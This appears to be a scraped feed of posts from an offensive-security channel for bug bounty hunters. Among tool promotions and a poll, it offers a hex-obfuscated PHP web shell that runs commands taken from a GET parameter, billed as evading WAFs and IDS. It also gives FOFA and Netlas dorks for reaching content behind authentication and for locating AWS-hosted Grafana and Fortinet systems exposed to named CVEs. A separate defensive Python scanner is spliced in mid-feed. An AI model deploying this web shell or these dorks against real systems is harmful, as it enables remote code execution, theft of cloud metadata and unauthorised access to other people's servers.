Brut Security
Which Android emulator do you use for mobile pentesting?
Brut Security
Hey guys, DarkShadow here - back again. You ever tried peeking inside a login panel that hits you with a 401 Unauthorized? No login, no creds - just pure access to the content behind it. I've got a wild dorking trick for that. Not your regular Google dork…
Hey Hunters,
DarkShadow here - back with a slick trick to bypass basic auth on certain subdomains!
Seen those subdomains with login pop-ups? Yep, the classic 401 Unauthorized. Usually, you can't access anything without creds.
But here's the twist…
Find 401 subdomains with:
domain="target.com" && status_code="401"
Got one? Nice.
Bypass trick:
If the target leaks any files or fingerprints (like JS, PDF, XLS, etc.) in public indexes (like FOFA), you can often access them without auth!
FOFA dork to find leaked files:
domain="401.target.subdomain" && (body=".php" || body=".pdf" || body=".xls" || body=".html" || body=".js" || body=".json" || body=".jpg" || body=".conf" || body=".jsp" || body=".css")
If you got 200 OK, boom - you're in.
In my test, I found a JS file that loaded fully in FOFA, even though it normally prompts for login.
Pro tip: Save the code, render it locally - and access internal content without creds!
So guys, did you like this basic recon trick? Want more from DarkShadow?
#bypass
#BrutDroid #AndroidHacking #BugBounty #Frida #BurpSuite #Pentesting #AutomationTools #BrutSecurity
YouTube
Android SSL Pinning Bypass | Magisk, Frida & Burp Suite Configuration for Android Studio | BrutDroid
BrutDroid v1.0.0 is here - your all-in-one Android emulator pentesting toolkit for pentesters, red teamers & bug bounty hunters!
Automate Frida server setup, root Android emulators with Magisk + rootAVD, install Burp certs system-wide, and bypass SSL…
Brut Security pinned «Introducing BrutDroid - The Ultimate Android Emulator Automation Toolkit. Root, Bypass, Intercept - all in just a few clicks. Powered by Frida, Magisk & Burp. Designed for Hackers. Automate your mobile testing workflow. Clean UI, real power, zero hassle.…»
Where are the reactions, guys?
Hey Hunters,
DarkShadow back at it again, dropping something many of you probably never noticed!
Did you know your Chrome DevTools is actually a webpage itself?
URL:
devtools://devtools/bundled/devtools_app.html
Yup, you read that right.
Try this:
Open the URL
Then hit F12 inside DevTools
BOOM - you're debugging the DevTools itself
Ever seen DevTools inside DevTools?
Welcome to the Devception
Let me know in the comments -
Who just learned this for the first time?
If you enjoy the kind of content I share, show some love - like, comment, and share it with your hacker fam.
#bugbountytips
Brut Security
Heads up, folks!
Just released BrutDroid recently - an automation toolkit for Android emulator testing. Put in a ton of effort, but honestly, the response hasn't been as strong as expected.
Might make it private soon. If you're planning to use it or have feedback, now's the time! Would love your thoughts.
https://github.com/Brut-Security/BrutDroid/
Feel free to DM or tag me with suggestions.
- Stay Brut.
GitHub
GitHub - Brut-Security/BrutDroid: BrutDroid - Android Studio Pentest Automator: Streamline mobile pentesting with automated emulator…
BrutDroid - Android Studio Pentest Automator: Streamline mobile pentesting with automated emulator rooting, Frida, and Burp Suite integration. - Brut-Security/BrutDroid
Perfect for anyone involved in:
Brut Security
Take advantage of this opportunity and explore ZoomEye's premium features!
#BrutSecurity #ZoomEye
Hey Hunters,
When it comes to dorking and reconnaissance, which search engine is your go-to and why?
Anonymous Poll
1. Google Dorking - 44%
2. Shodan - 25%
3. FOFA (now with AI!) - 20%
4. ZoomEye - 4%
5. Netlas - 2%
6. Censys - 6%
Brut Security
I made this payload that is able to bypass WAF, even IDS, to execute RCE
<?=eval(hex2bin("69662824785f3d245f4745545b305d297b73797374656d2824785f293b7d"))?>
Hex decode:
if($x_=$_GET[0]){system($x_);}
DarkShadow's secret payload, don't share outside
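A defender-side check for the pattern in the post above, as an added example that is not part of the original post: it finds eval(hex2bin("…")) calls in PHP source, decodes the hex literal, and reports command-execution functions and request input in the decoded text, which a plain string match on "system(" would miss. The names scan_php, HEX_EVAL, SINKS and INPUTS are hypothetical, and the sample input is constructed.

```python
import binascii
import re

# Matches eval(hex2bin("<hex>")) with optional whitespace and either quote style.
HEX_EVAL = re.compile(
    r"""eval\s*\(\s*hex2bin\s*\(\s*(['"])([0-9a-fA-F\s]+)\1\s*\)\s*\)""")

# PHP functions that run OS commands or code; a hit in decoded text is a strong signal.
SINKS = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|assert|eval)\s*\(", re.I)
# Request-controlled input reaching the decoded code.
INPUTS = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER|FILES)\b")


def scan_php(source):
    """Return one finding per eval(hex2bin(...)) call found in PHP source text."""
    findings = []
    for m in HEX_EVAL.finditer(source):
        hex_text = re.sub(r"\s+", "", m.group(2))
        try:
            decoded = binascii.unhexlify(hex_text).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            decoded = None  # odd-length literal: still reported, but not readable
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "decoded": decoded,
            "sinks": sorted({s.lower() for s in SINKS.findall(decoded or "")}),
            "user_input": bool(INPUTS.search(decoded or "")),
        })
    return findings


# Constructed sample: a harmless template line plus the payload quoted in the post.
SAMPLE = (
    "<?php echo htmlspecialchars($title); ?>\n"
    '<?=eval(hex2bin("69662824785f3d245f4745545b305d297b73797374656d2824785f293b7d"))?>\n'
)

if __name__ == "__main__":
    for finding in scan_php(SAMPLE):
        print(finding)
```

A finding with both a sink and user_input set is the combination to escalate first when sweeping a web root or an upload directory.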
CVE-2025-32756: Buffer Overflow in Fortinet products, 9.8 rating
Some Fortinet products, including FortiMail, FortiRecorder, and FortiVoice, are vulnerable to a buffer overflow that could allow a remote, unauthenticated attacker to execute arbitrary code or commands.
The vulnerability is not new, but a PoC was recently released!
Search at Netlas.io:
Link: https://nt.ls/nmu5K
Dork: certificate.subject.common_name:"FortiMail" OR certificate.subject.common_name:"FortiRecorder" OR certificate.subject.common_name:"FortiVoice"
Vendor's advisory: https://fortiguard.fortinet.com/psirt/FG-IR-25-254
Hey Hunters,
DarkShadow here, back again, just dropping a simple FOFA dork that I made to find all vulnerable Grafana versions which are using AWS and that helps you read all cloud metadata through Grafana SSRF CVE-2025-4123
FOFA dork:
app="grafana" && cloud_name="aws" && (body="Grafana v10.0.0" || body="Grafana v10.0.1" || body="Grafana v10.0.2" || body="Grafana v10.0.3" || body="Grafana v10.0.4" || body="Grafana v10.0.5" || body="Grafana v10.0.6" || body="Grafana v10.0.7" || body="Grafana v10.0.8" || body="Grafana v10.0.9" || body="Grafana v10.0.10" || body="Grafana v10.0.11" || body="Grafana v10.0.12" || body="Grafana v10.1.0" || body="Grafana v10.1.1" || body="Grafana v10.1.2" || body="Grafana v10.1.3" || body="Grafana v10.1.4" || body="Grafana v10.1.5" || body="Grafana v10.1.6" || body="Grafana v10.1.7" || body="Grafana v10.1.8" || body="Grafana v10.1.9" || body="Grafana v10.1.10" || body="Grafana v10.2.0" || body="Grafana v10.2.1" || body="Grafana v10.2.2" || body="Grafana v10.2.3" || body="Grafana v10.2.4" || body="Grafana v10.2.5" || body="Grafana v10.2.6" || body="Grafana v10.2.7" || body="Grafana v10.3.0" || body="Grafana v10.3.1" || body="Grafana v10.3.2" || body="Grafana v10.3.3" || body="Grafana v10.3.4" || body="Grafana v10.3.5" || body="Grafana v10.4.0" || body="Grafana v10.4.1" || body="Grafana v10.4.2" || body="Grafana v10.4.3" || body="Grafana v10.4.4" || body="Grafana v10.4.5" || body="Grafana v10.4.6" || body="Grafana v10.4.7" || body="Grafana v10.4.8" || body="Grafana v10.4.9" || body="Grafana v10.4.10" || body="Grafana v10.4.11" || body="Grafana v10.4.12" || body="Grafana v10.4.13" || body="Grafana v10.4.14" || body="Grafana v10.4.15" || body="Grafana v10.4.16" || body="Grafana v10.4.17" || body="Grafana v11.0.0" || body="Grafana v11.0.1" || body="Grafana v11.0.2" || body="Grafana v11.0.3" || body="Grafana v11.0.4" || body="Grafana v11.0.5" || body="Grafana v11.1.0" || body="Grafana v11.1.1" || body="Grafana v11.1.2" || body="Grafana v11.1.3" || body="Grafana v11.1.4" || body="Grafana v11.2.0" || body="Grafana v11.2.1" || body="Grafana v11.2.2" || body="Grafana v11.2.3" || body="Grafana v11.3.0" || body="Grafana v11.3.1" || body="Grafana v11.3.2" || body="Grafana v11.3.3" || body="Grafana v11.4.0" || body="Grafana v11.4.1" || body="Grafana v11.4.2" || body="Grafana v11.4.3" || body="Grafana v11.5.0" || body="Grafana v11.5.1" || body="Grafana v11.5.2" || body="Grafana v11.5.3" || body="Grafana v11.5.4" || body="Grafana v11.5.5" || body="Grafana v11.5.6" || body="Grafana v11.6.0" || body="Grafana v12.0.0")
Grep the full dork in comment
#dork #fofa #bugbountytips